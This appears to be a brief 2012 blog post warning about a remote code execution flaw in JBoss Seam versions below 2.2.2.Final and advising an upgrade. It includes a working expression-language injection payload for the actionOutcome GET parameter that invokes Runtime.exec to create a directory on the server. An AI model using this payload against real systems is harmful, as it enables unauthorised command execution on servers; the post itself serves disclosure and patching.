Monday, September 3, 2012

Never use JBoss Seam version below 2.2.2.Final

Today it will be the small post about very significant security hole in JBoss Seam versions below 2.2.2.Final.

It is possible to execute malware code on your server through Seam application using only browser's address bar. To check the issue add this to your GET parameters(works for Linux):
actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(expressions.getClass().forName('java.lang.Runtime')).exec('mkdir%20/tmp/pwned')}

This code will create 'pwned' directory in /tmp/ directory.

To close this vulnerability just update your JBoss Seam to 2.2.2.Final.

In this post I used the material of this article.To read more check these links:
  1. JBoss Seam Framework remote code execution
  2. JBoss Seam2 privilege escalation caused by EL interpolation in FacesMessages
  3. Abusing JBOSS
  4. Good Bye Critical Jboss 0day